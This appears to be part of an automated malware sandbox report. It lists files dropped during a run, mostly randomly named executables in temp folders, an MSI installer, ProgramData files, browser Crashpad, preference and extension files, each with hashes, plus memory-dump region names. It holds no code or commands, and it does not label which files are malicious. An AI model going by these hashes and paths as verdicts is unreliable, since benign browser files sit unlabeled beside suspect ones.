C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/5204-1060-0x000000001B1E0000-0x000000001B26C000-memory.dmp

memory/5204-1061-0x000000001B420000-0x000000001B5CC000-memory.dmp

C:\Windows\Installer\e595a9b.msi

MD5 aa58a0c608a2ec60555c011fe3788152
SHA1 39cb0cda4015b3dcc5e827a74f8f1f0b4e48cf0a
SHA256 564acb8e62d7ca9d440895bf347d8312fbfabb3d36eeacf247e115e766f499bd
SHA512 ff97035063141aa23a52c4b61c6e9585f66db2d6deed61b0a318e732790f4137af18fdf0fbd6e4648532da3f6a482046a183565cf3c0750101b13bc7d1763b77

memory/5204-1076-0x000000001C810000-0x000000001C996000-memory.dmp

C:\Config.Msi\e595a9a.rbs

MD5 a9350438d7ddf270fd3570c7d471a535
SHA1 a3f2b3f6647074f23ad7c9da3159dec94abb41e6
SHA256 e76bb6023495bd39ca2c74783a66aeeeec1305ba2ec0e2ab65f99672de34cfab
SHA512 8f631219c5e69eca569e3973a024daf2336fc7de87346a187e509706fdd407989151933a84e061a97458eb6995481d6279e69a395f34c2352ce42b20a8bd6521

memory/796-1085-0x0000000000480000-0x00000000005F0000-memory.dmp

memory/5204-1087-0x00000000023F0000-0x0000000002408000-memory.dmp

memory/5204-1086-0x0000000000AB0000-0x0000000000AC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10038840101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/12576-1110-0x0000000000B40000-0x0000000000B6C000-memory.dmp

C:\ProgramData\5phva\bs0r9z

MD5 8a4be8c12e8d63b1b1799e7b3d5805fc
SHA1 adc2b4489a10596d7ef947bc81a7fc9986610d28
SHA256 e9c4890ba80fb9b60ab62e0deb51e6a5c8f67615a67e86bcd1e49aa5f60a52ae
SHA512 bfa417b04bb22bdffbdd7215600f0b6386ab6c6bec8aecb1e0f5a696d79ca55bfbb3f4f27a0f6afc871b84a5224b22aa629bf5c015a814bf84d176d7bef2ff03

memory/33052-1173-0x00000000003B0000-0x000000000088E000-memory.dmp

C:\ProgramData\5phva\ecbiw4

MD5 777045764e460e37b6be974efa507ba8
SHA1 0301822aed02f42bee1668be2a58d4e47b1786af
SHA256 e5eff7f20dc1d3b95fa70330e2962c0ce3fce442a928c3090ccb81005457cb0f
SHA512 a7632f0928250ffb6bd52bbbe829042fd5146869da8de7c5879584d2316c43fb6b938cc05941c4969503bfaccdec4474d56a6f7f6a871439019dc387b1ff9209

memory/33052-1181-0x00000000003B0000-0x000000000088E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 bd91c0f22d990f53b9f7cb0702985f50
SHA1 276b3c7852a75182cbc21d8e8406832ec7ec72f4
SHA256 f710a6f822b0eee3d2b75844dec5ad14a84f1a9560fd2dfe2293bd8af5df64ab
SHA512 adcc09d91dec4e4115c1ca0b8bec0e8e718691c45e001747b84da1d4ef2e4f3cad2e97675606053b663c83c862eec4ec8c750ffbc8e77b8f646a832853a18e1e

C:\Users\Admin\AppData\Local\Temp\scoped_dir35316_1427444379\CRX_INSTALL\manifest.json

MD5 b0422d594323d09f97f934f1e3f15537
SHA1 e1f14537c7fb73d955a80674e9ce8684c6a2b98d
SHA256 401345fb43cb0cec5feb5d838afe84e0f1d0a1d1a299911d36b45e308f328f17
SHA512 495f186a3fe70adeaf9779159b0382c33bf0d41fe3fe825a93249e9e3495a7603b0dd8f64ca664ea476a6bafd604425bf215b90b340a1558abe2bf23119e5195

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G7CUOJGL\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\scoped_dir35316_1427444379\CRX_INSTALL\_locales\en_US\messages.json

MD5 64eaeb92cb15bf128429c2354ef22977
SHA1 45ec549acaa1fda7c664d3906835ced6295ee752
SHA256 4f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c
SHA512 f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\service_worker_bin_prod.js

MD5 bc4dbd5b20b1fa15f1f1bc4a428343c9
SHA1 a1c471d6838b3b72aa75624326fc6f57ca533291
SHA256 dfad2626b0eab3ed2f1dd73fe0af014f60f29a91b50315995681ceaaee5c9ea6
SHA512 27cb7bd81ed257594e3c5717d9dc917f96e26e226efb5995795bb742233991c1cb17d571b1ce4a59b482af914a8e03dea9cf2e50b96e4c759419ae1d4d85f60a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\_locales\en_US\messages.json

MD5 578215fbb8c12cb7e6cd73fbd16ec994
SHA1 9471d71fa6d82ce1863b74e24237ad4fd9477187
SHA256 102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1
SHA512 e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\manifest.json

MD5 c1650b58fa1935045570aa3bf642d50d
SHA1 8ecd9726d379a2b638dc6e0f31b1438bf824d845
SHA256 fea4b4152b884f3bf1675991aed9449b29253d1323cad1b5523e63bc4932d944
SHA512 65217e0eb8613326228f6179333926a68d7da08be65c63bd84aec0b8075194706029583e0b86331e7eeec4b7167e5bc51bca4a53ce624cb41cf000c647b74880

C:\Users\Admin\AppData\Local\Temp\10038870101\0frhMAb.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fc5dc5b6d5cdbc51abef41b0f9ec7695
SHA1 14b456ef8f171ac2decab7e68d82600e9a7453e4
SHA256 f5bcd6a82e89c94bb94ae631858701065ad9e144dbbaa0fbbc20144ee9bea6df
SHA512 f1e3e5993eb6f0d0f8fc8bd7f81bca7e7855e95b78b949d1037e90e6631ccad80013cb09a8d5d60f40701b48109bdf9bb36f0441f64645c6c9f3bba49926f6d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\53acf0eb-17b0-45b0-82a6-cd9af056c7c5.tmp

MD5 a424d63b1c967ecc412f13eda03f6dc5
SHA1 31bb09dd9efe162457df281c067da2e5d5ab765c
SHA256 83c95ac1a65f549386531273049c9f489d2993c1c48dd812b85a31afb1a32129
SHA512 99d461d94db30046ba1b18f60dbbf92cc4c4ab105a9c256acc98e8cb60b352bb1a21919d1575f2dba24b8d6786e89118f728d834d4b5110eef8f261a9978d3c0

C:\Users\Admin\AppData\Local\Temp\10038880101\6NPpGdC.exe

MD5 75728febe161947937f82f0f36ad99f8
SHA1 d2b5a4970b73e03bd877b075bac0cdb3bfc510cf
SHA256 0a88c347a294b22b6d6554b711db339bca86c568863dec7844a2badec6ef4282
SHA512 7cfdf76b959895ae44abe4171662d9c6c28dfd444030d570fea0fa4f624adf226e35d655dd89b159a1e0d08bcd97dfe899c3646d7682aacf5f2dabfbdf3d9a67

memory/56880-1692-0x0000000000700000-0x000000000075C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\a3a588a0-5384-41fd-8db4-90e94cc9c1ae.dmp

MD5 9dd16da2823b4d0740ea314c35bc74df
SHA1 5f34f6a96cb98d29a12faf265965889e4e2aa883
SHA256 2dcc57a92989dd1539931697091a354b46c552f2a94eb586843e652049533d38
SHA512 8e7a69083d18e01e577ced5069e6e090bfaa8dbfb851d014f780f0df77c2890eca9b7a0ff9565f6950990fd8141e6930341ca8c8a65902a059c5442c3953fdb6

memory/43568-1736-0x0000025DB3150000-0x0000025DB31A2000-memory.dmp

memory/43568-1737-0x0000025DCCF70000-0x0000025DCD07A000-memory.dmp

memory/43568-1738-0x0000025DB3370000-0x0000025DB3382000-memory.dmp

memory/43568-1739-0x0000025DB3500000-0x0000025DB353C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10038890101\5c86579672.exe

MD5 9e3110a7e155297b4a8b2324c31147d2
SHA1 cffe1b51d8579cefd79a74df881ac5529555525b
SHA256 5785fdaa656a4cb5b6fd42f528be1c3326ed92696b4c6e176779a5d4d2cc883f
SHA512 9cd222acd97169febeb98990fbae502aa99aade0f9b981ba8cd88f2c7a8b22a2cfcf3909f432a8ad532fdd19d4d4eb863b890460e15792a6fa4229dc762377e3

memory/83416-1753-0x0000000000DD0000-0x00000000010D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 18a8077a0d2924eba7804a691b208616
SHA1 1d737e32688967ef0afaad7e906aed15312af907
SHA256 689ec7b6ad51ee1e4514a1e4c985ebd436a4d46f4d9d9f373e909715bfbeb523
SHA512 6826156e82ca5b2a0d12b323e231b684b440234e45c1d7ae69d3d0f6b8ffdfcea4791a18ddd428b5c2c6b8d5ff9f19d9d207385e58336f6bf1b63d0acb8af58f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7ad30b84eb73600f65eb7fefe4664627
SHA1 8946a46f07ef6b08b0b731029ffbc2b3fc10434a
SHA256 c29e3a9826ffae5b7ed397ff899e8cbac18f479d3fa07bbda02111fc3054fbca
SHA512 3e252fade95307e35bc8531a3ae3e39650f3ead81176cdd1ec00320a819f36b504b757d63afd8a406c14f817497582ae441dc7c61948ad37e1ff9572429568ab

memory/43568-1803-0x0000025DCCE60000-0x0000025DCCEB0000-memory.dmp

memory/43568-1808-0x0000025DCD450000-0x0000025DCD612000-memory.dmp

memory/43568-1809-0x0000025DCDB50000-0x0000025DCE078000-memory.dmp

memory/83416-1811-0x0000000000DD0000-0x00000000010D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10038900101\fa494a26c4.exe

MD5 977cb8c87f5af026b73fde1dc4b75a0e
SHA1 8b5bb58ca523b459afbb469bc1fedc0aebb1155f
SHA256 1e068af2dd82efea11c6eaffb036901f5653fd63133ca8e99ff3e62d7dd403a2
SHA512 43145a48cbf389fd96c386a3fdb238b2105a6b629284802ccc4b4029bc9e1e6d1d9d031c6452ae9f26f3b19db97ee0fe400a6d28135c2bd4f1378b1e8ab69f5e

memory/97364-1825-0x0000000000160000-0x0000000000809000-memory.dmp

memory/97364-1827-0x0000000000160000-0x0000000000809000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8dfd4d9d833d0ec34e7d0542a78ac1ff
SHA1 2801d04e2e2e1d14cc944cc1837d24ba19535786
SHA256 c8afc845505edf650398d09a9c82d6f85fd52cd40b20ee7d6d91a0523f5bee58
SHA512 c96fd92ddbaa84c366d578ba721dd7e8be220811a97e119d57c9cb7c004301091ce27fb133b6e3c26dd81795913e4b43107d77a6ecea3e3c4826c79da12e9246

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 e75c9690ad529169e72d661314e0b940
SHA1 cc3f4707f2011e837b8bc74d7fb7607a00980cbc
SHA256 f667b148240319e955d86377d830f9746351ebef337e003f70528529cf6ce03f
SHA512 8d35e048b9c296af6a5891f8b87912e626ddba5f7be29abfe0683fe9bcbffef5646718d1f208f64593a715bc3935afaf983a9ac209925e04edeae8eafdd3fb99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c5acf99f-539f-41ad-bdcc-c4f9d4e71646.dmp

MD5 91b6cda7b8b758d2afa1eb6c10a6cba3
SHA1 02f9589930c3232e51eb35ff52d7055e8411ea67
SHA256 7e182f256f25cbdd0f4f071cd44318f0ab713ff271bf32dd979983fdeefda459
SHA512 daa8d3f71d73d513a22205607195548d919f317c51c0e34a3bca18eb0a76eb5da13fb1ce3a2bb1bb2b5f5d785419d05b962726d1d721704efa9f93b73e1d3d25